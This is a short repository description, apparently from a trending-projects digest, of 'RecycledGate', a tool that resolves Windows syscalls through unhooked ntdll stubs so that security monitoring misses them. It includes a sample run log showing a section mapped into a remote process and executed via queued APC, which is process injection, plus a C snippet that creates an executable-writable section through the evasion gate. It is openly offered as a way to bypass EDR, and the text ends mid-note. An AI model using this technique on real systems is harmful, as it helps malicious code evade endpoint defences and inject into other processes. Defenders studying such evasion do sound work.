thefLink / RecycledGate
- суббота, 5 февраля 2022 г. в 00:34:05
Hellsgate + Halosgate/Tartarosgate. Ensures that all systemcalls go through ntdll.dll
This is just another implementation of Hellsgate + Halosgate/Tartarusgate.
However, this implementation makes sure that all system calls still go through ntdll.dll to avoid the usage of direct systemcalls.
To do so, I parse the ntdll for nonhooked syscall-stubs and re-use existing syscall;ret instructions - thus the name of this project.
This probably bypasses some EDR trying to detect abnormal systemcalls.
I have verified the sample program in this repository against syscall-detect by @winternl_t which uses the HookingNirvana technique to detect abnormal systemcalls.
.\Sample.exe HelloWorld.bin
[SYSCALL-DETECT] Console logging started...
[SYSCALL-DETECT] ntdll BaseAddress: 0x368508928
[SYSCALL-DETECT] win32u BaseAddress: 0x0
[*] Resolving Syscall: 916c6394
Found syscall using Halos gate
Found syscall; ret instruction
Syscall nr: 74
Gate: 00007FF9160100E2
[SNIP]
[*] Resolving Syscall: 8a4e6274
Found syscall using Halos gate
Found syscall; ret instruction
Syscall nr: 188
Gate: 00007FF916010F12
[*] Created section: 0x00000000000000B4
[*] Mapped section locally: 0x000001B244E50000
[*] Mapped section remote: 0x0000000000FE0000
[*] NtQueueApcThread successfull
[*] Resumed thread
The sample program can be found in the sample folder
Here is a snippet, which should be self-explanatory.
Syscall sysNtCreateSection = { 0x00 };
NTSTATUS ntStatus;
dwSuccess = getSyscall(0x916c6394, &sysNtCreateSection);
if (dwSuccess == FAIL)
goto exit;
PrepareSyscall(sysNtCreateSection.dwSyscallNr, sysNtCreateSection.pRecycledGate);
ntStatus = DoSyscall(&hSection, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, NULL, (PLARGE_INTEGER)&sizeBuffer, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL);
if (!NT_SUCCESS(ntStatus)) {
printf("[-] Failed to create section\n");
goto exit;
}
Note: